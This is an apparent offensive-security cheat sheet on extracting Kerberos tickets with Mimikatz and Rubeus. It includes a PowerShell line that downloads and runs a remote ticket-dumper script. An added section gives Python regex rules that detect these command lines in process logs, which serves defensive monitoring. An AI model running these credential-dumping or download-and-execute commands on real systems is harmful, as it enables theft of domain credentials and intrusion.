Ticket Acquisition
Requirements
Unprivileged
Can extract Kerberos tickets for the current user context
Privileged (Elevated)
Can extract all Kerberos tickets on the given system
Tools
PowerShellKerberos:
Tool Usage
Mimikatz
# Export to file methods
# Export tickets (preferred method, more accurate)
Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"
# Alternative Method
Mimikatz.exe "token::elevate" "kerberos::list /export"
# Export to Base64 without touching disk
Mimikatz.exe "token::elevate" "standard::base64 /out:true" "sekurlsa::tickets /export"
Rubeus
# Dump All
.\Rubeus.exe dump /nowrap
# Dump tickets that match a specified service
.\Rubeus.exe dump /service:krbtgt /nowrap
.\Rubeus.exe dump /service:HTTP /nowrap
# Dump tickets for specified users
.\Rubeus.exe dump /user:administrator /nowrap
# Filter by both service and user
.\Rubeus.exe dump /service:krbtgt /user:administrator /nowrap
PowerShellKerberos
# Load into memory and dump
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/main/dumper.ps1')
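Detection note (added example, not part of the original page or of any tool listed here): the command lines above leave recognizable arguments in process-creation logs, such as Windows Security event 4688 with command-line auditing or Sysmon event 1. The Python below matches those arguments in captured command lines; the rule names, event fields, hosts, paths and the example.invalid URL are constructed for illustration.

```python
import re

# Rules derived from the command lines listed above. They key on arguments,
# not on the image name, so a renamed binary is still flagged.
RULES = [
    ("mimikatz-ticket-export",
     re.compile(r"\b(?:sekurlsa::tickets|kerberos::list)\b.*?/export\b")),
    ("mimikatz-base64-output", re.compile(r"\bstandard::base64\b")),
    ("rubeus-style-dump",
     re.compile(r"\bdump\b(?=.*(?:/nowrap|/service:|/user:))")),
    ("powershell-download-cradle",
     re.compile(r"\b(?:iex|invoke-expression)\b.*downloadstring\(")),
]

def normalize(cmdline):
    """Lowercase, drop quoting/escape characters, collapse whitespace."""
    stripped = re.sub(r"[\"'^`]", "", cmdline.lower())
    return re.sub(r"\s+", " ", stripped).strip()

def match_rules(cmdline):
    """Return the names of all rules that fire on one command line."""
    norm = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(norm)]

def triage(events):
    """Return (host, image, rule names) for every event with at least one hit."""
    scored = ((ev, match_rules(ev["command_line"])) for ev in events)
    return [(ev["host"], ev["image"], hits) for ev, hits in scored if hits]

# Constructed sample events (hypothetical hosts and paths), shaped like
# process-creation records with the command line captured.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Temp\Mimikatz.exe",
     "command_line": 'Mimikatz.exe "token::elevate" "sekurlsa::tickets /export"'},
    {"host": "WS02", "image": r"C:\Users\Public\svc.exe",
     "command_line": r"svc.exe dump /service:krbtgt /nowrap"},
    {"host": "WS03", "image": r"C:\Windows\System32\klist.exe",
     "command_line": "klist tickets"},
    {"host": "WS04", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c \"IEX(New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/dumper.ps1')\""},
]

if __name__ == "__main__":
    for host, image, rules in triage(SAMPLE_EVENTS):
        print(host, image, ",".join(rules))
```

Argument matching only sees what the process-creation log records, so it is best paired with PowerShell script block logging for the in-memory case.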
Ticket Injection
WIP